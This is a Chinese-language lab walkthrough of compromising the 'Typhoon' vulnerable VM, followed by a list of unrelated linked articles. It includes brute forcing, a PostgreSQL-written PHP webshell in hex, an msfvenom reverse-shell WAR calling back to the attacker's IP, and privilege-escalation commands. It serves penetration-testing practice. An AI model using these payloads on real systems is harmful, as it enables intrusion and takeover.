typhoon靶機滲透

2021-03-02 星盟安全
前言&靶機簡介

這個靶機挺多漏洞,知識點很廣,所以決定自己來打一遍,算是複習一些很久前的知識點,就從一個埠一個埠來滲透吧,看看有什麼知識點

埠掃描

25埠用戶名枚舉

為啥先這個埠呢,因為後面要滲透21和22埠很大可能會爆破,25埠版本為Postfix smtpd,可以進行用戶名枚舉,為後面爆破提供方便

存在root、typhoon、admin這三個用戶

未授權訪問

使用nc連接25埠

不過貌似不能發郵件

21埠

首先在網上搜了一下vsftpd 3.0.2這個版本有沒有什麼漏洞,沒有結果,於是嘗試一些通用的基本操作

ftp匿名訪問

探測了一下發現存在ftp匿名訪問

於是登錄一下,查看當前路徑及列目錄

嘗試上傳文件

發現權限不允許,所以21埠暫時沒有其它利用方式

ftp爆破

因為知道了存在以上用戶,所以使用hydra爆破

得到了typhoon的密碼
繼續爆破admin的密碼,同樣成功爆破

root爆破無果

22埠

帳號密碼和21埠一樣

111&2049埠

這是一個NFS服務,測試一下是否存在未授權訪問允許掛載文件,確實存在

查詢目標NFS共享目錄情況

showmount -e 192.168.80.4


然後掛載typhoon目錄

mount -t nfs 192.168.80.4:/typhoon /tmp/mut/

445埠

使用enum4linux枚舉目標共享信息

enum4linux 192.168.80.4


也順便列出了存在的用戶名typhoon、admin、postfixuser

發現允許空帳戶、空密碼登錄,共享文件typhoon
遠程掛載,密碼隨便輸就行

5432埠

這個埠是PostgreSQL資料庫,嘗試爆破一下帳號密碼
帳號密碼都為postgres

讀/etc/passwd

DROP TABLE if EXISTS ghtwf01;
CREATE TABLE ghtwf01(t TEXT);
COPY ghtwf01 FROM '/etc/passwd';
SELECT * FROM ghtwf01;

寫一句話

創建OID,清空內容

SELECT lo_create(4444);
delete from pg_largeobject where loid=4444;

將一句話木馬16進位編碼為

3C3F70687020406576616C28245F504F53545B277368656C6C275D293B203F3E

插入

insert into pg_largeobject (loid,pageno,data) values(4444, 0, decode('3C3F70687020406576616C28245F504F53545B277368656C6C275D293B203F3E', 'hex'));

導出數據到指定文件

SELECT lo_export(4444, '/var/www/html/shell.php');


成功getshell

6379埠

這個埠是Redis,測試一下是否存在未授權訪問
確實存在

Redis利用方式有三種

1.Redis寫webshell
2.Redis寫計劃任務反彈shell
3.Redis寫ssh公鑰

詳細見我之前寫的一篇Redis利用方式總結:https://www.ghtwf01.cn/index.php/archives/407/

80埠drupal Drupalgeddon 2遠程代碼執行(CVE-2018-7600)

目錄掃描發現了它,直接上msf

LotusCMS 遠程代碼執行

在cms目錄,同樣msf

dvwa

帳號密碼是默認的admin/password
這裡面全是洞,直接命令執行彈shell

phpmyadmin

利用dvwa裡面的文件包含漏洞或獲取dvwa配置文件信息拿到資料庫帳號密碼登錄

8080埠

發現是Tomcat,先目錄掃描一下,找到後臺manager,需要帳號密碼
使用msf爆破一下

帳號密碼都為tomcat
進入後臺發現版本號7.0.52,有上傳點,所以就是部署war後門

手動

使用msf生成war包後門

msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.80.130 lport=4444 -f war -o shell.war


打開發現後門名叫hmmliavgsqxlddq.jsp
上傳shell.war
訪問shell/hmmliavgsqxlddq.jsp反彈shell

自動

msf一把梭

權限提升

這裡演示幾種提權方式

內核提權

uname -a查看內核版本

搜索一下,發現存在內核提權

然後上傳exp,編譯運行

配置不當提權

先切換成bash

python -c 'import pty;pty.spawn("/bin/bash")'

發現在tab目錄下有一個script.sh文件所有用戶都可以操作,於是在裡面寫入反彈shell命令,但是反彈過來的不是root權限,而且返回來的shell還挺難操作,有點迷


看到可以使用nc,於是使用msf裡面的nc反彈shell

然後成功反彈shell

sudo提權

前提是已經獲得當前普通用戶的密碼,並且當前用戶屬於sudo組,這裡使用的admin用戶
查看一下sudo權限範圍

因為安全了python,直接

sudo python -c 'import pty;pty.spawn("/bin/bash")'

拿到root權限

或者sudo -i

方法很多

相關焦點

  • hackme:2 靶機攻略
    而且沒有太多的腦洞,適合安全工作者們用來練習滲透測試,然而唯一的缺憾是目前沒有公開的攻略,因此把個人的通關過程記錄於此,作為攻略分享給大家! 0x02 技術關鍵詞:SQL注入、WAF Bypass、模糊測試、文件上傳、suid提權 0x03 靶機發現與埠掃描
  • 滲透測試實戰——prime靶機入侵
    Ip:192.168.0.115Kali:192.168.0.21安裝好的靶機界面Nmap掃描埠【
  • Typhoon 2012
    They were severe tropical storm Doksuri (1206), typhoon Vicente (1208), severe typhoon Saola (1209), typhoon Damrey (1210), severe typhoon Haikui (1211),typhoon Kai-tak (1213) and severe typhoon TembinE
  • HTB-靶機-Jail
    本篇文章僅用於技術交流學習和研究的目的,嚴禁使用文章中的技術用於非法目的和破壞,否則造成一切後果與發表本文章的作者無關靶機是作者購買
  • 2020暗月滲透測試全棧學習班
    7課01 內網滲透篇_隧道技術ssh隧道02 內網滲透篇 埠轉發與埠映射03 內網滲透篇_隧道技術socket隧道04 內網滲透篇_跨路由掃描05 內網滲透篇_常見的內網測試06 內網滲透篇_域的搭建07 內網滲透篇一次完整的域滲透第十五天 exp編寫篇8課01 注入exp的簡單編寫02 簡單注入exp編寫 python03 POST注入exp編寫04 getshell exp編寫05 需要驗證的
  • 2021暗月滲透測試全棧學習班
    7課01 內網滲透篇_隧道技術ssh隧道02 內網滲透篇 埠轉發與埠映射03 內網滲透篇_隧道技術socket隧道04 內網滲透篇_跨路由掃描05 內網滲透篇_常見的內網測試06 內網滲透篇_域的搭建07 內網滲透篇一次完整的域滲透第十五天 exp編寫篇8課01 注入exp的簡單編寫02 簡單注入exp編寫 python03 POST注入exp編寫04 getshell exp編寫05 需要驗證的
  • 從玩轉靶機DVWA看程序設計安全
    前言靶機,在軍事領域意指作為射擊訓練目標的一種軍用飛行器。類似地,在網絡安全行業,靶機,也稱靶場,泛指作為滲透測試用途的一種軟體或系統。常見的滲透測試靶機系統有DVWA、Metasploitable、mutillidaemutillidae、SQLol、hackxor、BodgeIt、Exploit KB、WackoPicko、OWASP Hackademic、WebGoat、XSSeducation、Web for Pentester、Lazysysadmin等等,舉不勝舉。DVWA就是其中最著名、最基礎的靶場。
  • DC-4靶機解題思路
    > 說明:Vulnhub是一個滲透測試實戰網站
  • Vulnhub靶機實戰之HA: Forensics
    目標:獲得4個flag靶機下載地址:https://www.vulnhub.com/entry/ha-forensics,570/本文涉及知識點實操練習--Vulnhub滲透測試實戰靶場Drupal https://www.hetianlab.com/expc.do?
  • 臺軍聯合實彈演戲試射 靶機掉落臺東縣街頭(圖)
    臺軍聯合實彈演戲試射 靶機掉落臺東縣街頭(圖) 2012年07月09日 14:27 來源:中國臺灣網 字號:  小  中  大 轉發
  • 衝繩發現帶漢字無人靶機 臺灣研究機構:我們的
    (觀察者網訊)日本衝繩海岸近日發現一架來歷不明的無人機,機身上標有字以及美軍無人靶機字母編號,他的歸屬引發輿論關注。臺灣地區「中科院」今天出面坦承,是該院所屬的靶機。衝繩海岸的無人靶機 視頻截圖據臺灣「聯合新聞網」9月11日報導,臺灣「中科院」本身有靶機使用能力,今天下午發出新聞稿坦承,初步分析這架「MQM-107E」靶機,是日前配合演訓使用的無人靶機,靶機屬一般訓練用途,沒有裝置機敏裝備及參數。
  • Tropical depression will evolve into the 7th typhoon this...
    On the afternoon of August 16, a tropical depression in the northeastern offshore of Philippines was generated and was on track to develop into this year’s 7th typhoon
  • [內網滲透] CFS三層網絡環境實戰
    靶機系列文章最後一篇,之前文章中的靶機連結,文末中會給出,請注意保存...
  • 砥礪過硬的戰場「磨刀石」——記中部戰區空軍某訓練基地靶機分隊...
    紅軍指揮員想見的對手正是湯俊林——中部戰區空軍某訓練基地靶機分隊分隊長。這次演習中,湯俊林負責放飛和操縱靶機。「湯俊林往往『不按常理出牌』,讓對手很頭疼!」湯俊林的教導員馬志宇說。「不按常理出牌」的湯俊林讓空軍地空飛彈某營官兵記憶深刻。
  • Ferry services on south China strait halted as typhoon...
    Ferry services on the Qiongzhou Strait in south China have been halted as of Tuesday afternoon as a typhoon is fast approaching the southern provinces of Hainan and Guangdong, local authorities have said
  • 你們都以為 typhoon 是「颱風」的音譯?錯了!
    颱風來了,今天就來和小編來學習一下吧~英文的颱風是typhoon (/tafun/),你是不是覺得念著很熟悉?沒錯,和中文裡「颱風」的發音很相似。所以很多人認為的英文「typhoon」就是中文的「颱風」的音譯這種說法是不正確的,其實,英文中的「typhoon」也有著自己的一套說法。這個詞最初是來自希臘神話一個體格無比龐大的怪物提豐。提豐的名字叫做Typhon,在希臘語中就是「狂風、旋風」的意思。
  • 山姆大叔財大氣粗:很多國家買不起的三代機 它居然用來當靶機
    第三種就比較普遍了,一般是改裝成靶機,以供防空演練之用。而美國目前的靶機有兩種,一種是QF4、另一種是QF16。顧名思義,"QF4"就是F4"鬼怪"戰機退役後成為了靶機;"QF16"則是F16"戰隼"。許多國家由於經濟或者外交因素無法獲得這兩款戰機,進而感嘆美國空軍對裝備的"浪費"。
  • 零基礎如何學習Web安全滲透測試?這可能是史上最詳細的自學路線圖!
    因為 Web 安全滲透技術,首先是建立在 Web 技術之上的,繞開這些技術談安全談滲透,那便是 "空中樓閣"。熟悉CTF靶機滲透測試實戰,通過CTF4、CTF6、CTF7等攻防實踐,真正掌握黑盒測試、攻擊鏈、紅隊等一系列方法。熟悉Windows與Linux常見漏洞復現實踐,包括CVE-2017-7494-SambyCry遠程代碼執行、CVE-2017-16995-Ubuntu16.04本地提權、MS17-010-永恆之藍-Windows提權等。
  • Coastal areas batten down the hatches as typhoon nears
    Talim, the 13th this year, "is probably the strongest typhoon China will experience Forecasters urged local authorities to be fully prepared for the worst, saying the typhoon
  • China’s first upper-air UAV integrated typhoon sounding...
    On the afternoon of August 2, during the impact of this year’s 3rd typhoon Sinlaku on Hainan, an upper-air meteorological Unmanned Aerial Vehicle (UAV) lifted off from Boao